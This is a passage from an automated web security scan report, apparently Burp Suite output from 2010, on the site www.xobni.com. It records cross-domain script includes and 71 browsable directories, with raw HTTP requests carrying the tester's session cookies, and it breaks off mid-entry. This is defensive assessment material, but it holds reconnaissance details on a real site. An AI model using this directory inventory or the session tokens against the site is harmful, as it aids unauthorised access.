Date: Tue, 14 Dec 2010 01:18:07 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13407

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Salesforce in Out
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.120. http://www.xobni.com/search-conversations previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/search-conversations

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /search-conversations HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/plus/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:16:31 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11562

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Search Conversati
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.121. http://www.xobni.com/search-outlook previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/search-outlook

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /search-outlook HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:16:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13631

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Search Outlook wi
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.122. http://www.xobni.com/social-outlook previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/social-outlook

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /social-outlook HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:17:30 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13039

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni for Microso
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.123. http://www.xobni.com/support/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/support/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js
http://asset0.zendesk.com/external/zenbox/zenbox-2.0.js

Request

GET /support/ HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; trigger_id=10432362; downloaded_version=12772; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.10.10.1292288423

Response

12.124. http://www.xobni.com/support/contact_form previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/support/contact_form

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /support/contact_form HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:04:12 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10785

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<TITLE>Contact</TITLE>
<link rel='stylesheet' href='/csscache/1256842155/style
...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.125. http://www.xobni.com/support/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/support/index.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js
http://asset0.zendesk.com/external/zenbox/zenbox-2.0.js

Request

GET /support/index.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

12.126. http://www.xobni.com/threaded-conversations previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/threaded-conversations

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /threaded-conversations HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:17:29 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12774

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Thread Email Conv
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.127. http://www.xobni.com/twitter-outlook previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/twitter-outlook

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /twitter-outlook HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/huddle-outlook
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:17:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13051

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Twitter from Outl
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.128. http://www.xobni.com/xing-outlook previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/xing-outlook

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /xing-outlook HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/huddle-outlook
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:18:17 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13706

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>XING avec Xobni d
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.129. http://www.xobni.com/xlbh084ghjklyvco872656468 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/xlbh084ghjklyvco872656468

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /xlbh084ghjklyvco872656468 HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/robots.txt
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:18:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7955

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.130. http://www.xobni.com/xlbh084ghjklyvco872656468/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/xlbh084ghjklyvco872656468/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /xlbh084ghjklyvco872656468/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/robots.txt
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:18:26 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7958

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.131. http://www.xobni.com/xlbh084ghjklyvco872656468/jhvbil75jhsd2546s7l previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/xlbh084ghjklyvco872656468/jhvbil75jhsd2546s7l

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /xlbh084ghjklyvco872656468/jhvbil75jhsd2546s7l HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/robots.txt
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:18:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8015

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.132. http://www.xobni.com/xlbh084ghjklyvco872656468/jhvbil75jhsd2546s7l/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/xlbh084ghjklyvco872656468/jhvbil75jhsd2546s7l/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /xlbh084ghjklyvco872656468/jhvbil75jhsd2546s7l/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/robots.txt
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:18:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8018

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.133. http://www.xobni.com/xobni-plus previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/xobni-plus

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /xobni-plus HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/plus/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:16:00 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 14961

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Plus - Rech
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.134. https://www.xobni.com/support/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.xobni.com
Path:	/support/

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js
https://asset0.zendesk.com/external/zenbox/zenbox-2.0.js

Request

GET /support/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

12.135. https://www.xobni.com/videos/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.xobni.com
Path:	/videos/

Issue detail

The response dynamically includes the following script from another domain:

https://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /videos/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

13. Directory listing previous next
There are 71 instances of this issue:

/enterprise/case_studies/
/enterprise/datasheets/
/errors/
/icons/
/images/
/images/badge/
/images/banners/
/images/buttons/
/images/client/
/images/company/
/images/company/adayat/
/images/company/carousel/
/images/company/team/
/images/features/
/images/gadgets/
/images/headers/
/images/highlights/
/images/howto/
/images/icons/
/images/installer/
/images/jobs/
/images/linkedin_proxy/
/images/mascot/
/images/partners/
/images/parts/
/images/press/
/images/promo/
/images/screenshots/
/images/store/
/images/structure/
/images/structure/ambient1/
/images/structure/amblue/
/images/structure/download/
/images/structure/global/
/images/structure/global/v1_8s/
/images/structure/homepageapr10/
/images/structure/homepageaug10/
/images/structure/homepagejul10/
/images/structure/homepagemar10/
/images/structure/homepagenov09/
/images/structure/linkedin/
/images/structure/partners_amblue/
/images/structure/partners_gray/
/images/structure/press/
/images/structure/skype/
/images/structure/videoinline/
/images/team/
/images/welcome_screen/
/javascripts/
/javascripts/swfobject/
/javascripts/swfobject/2.2/
/media/
/media/contextual_gadgets/
/media/contextual_gadgets/hoovers/
/media/contextual_gadgets/hoovers/images/
/media/enterprise/
/media/gadgets/
/media/invites/
/media/labs/
/media/mobile/
/media/plus/
/media/press/
/media/tutorials/
/media/walkthroughs/
/media/welcome_screen/
/media/widgets/
/media/widgetsv2/
/media/widgetsv3/
/opensource/
/opensource/MonoGZipStream/
/opensource/NsisDotNet/

Issue description

Directory listings do not necessarily constitute a security vulnerability. Any sensitive resources within your web root should be properly access-controlled in any case, and should not be accessible by an unauthorised party who happens to know the URL. Nevertheless, directory listings can aid an attacker by enabling them to quickly identify the resources at a given path, and proceed directly to analysing and attacking them.

Issue remediation

There is not usually any good reason to provide directory listings, and disabling them may place additional hurdles in the path of an attacker. This can normally be achieved in two ways:

Configure your web server to prevent directory listings for all paths beneath the web root;
Place into each directory a default file (such as index.htm) which the web server will display instead of returning a directory listing.

13.1. http://www.xobni.com/enterprise/case_studies/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/enterprise/case_studies/

Request

GET /enterprise/case_studies/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:57 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 2378
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /enterprise/case_studies</title>
</head>
<body>
<h1>Index of /enterprise/case_studies</h1>
<table><tr><th><im
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/enterprise/">Parent Directory</a>
...[SNIP]...

13.2. http://www.xobni.com/enterprise/datasheets/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/enterprise/datasheets/

Request

GET /enterprise/datasheets/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:10:08 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1804
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /enterprise/datasheets</title>
</head>
<body>
<h1>Index of /enterprise/datasheets</h1>
<table><tr><th><img sr
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/enterprise/">Parent Directory</a>
...[SNIP]...

13.3. http://www.xobni.com/errors/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.xobni.com
Path:	/errors/

Request

GET /errors/ HTTP/1.1
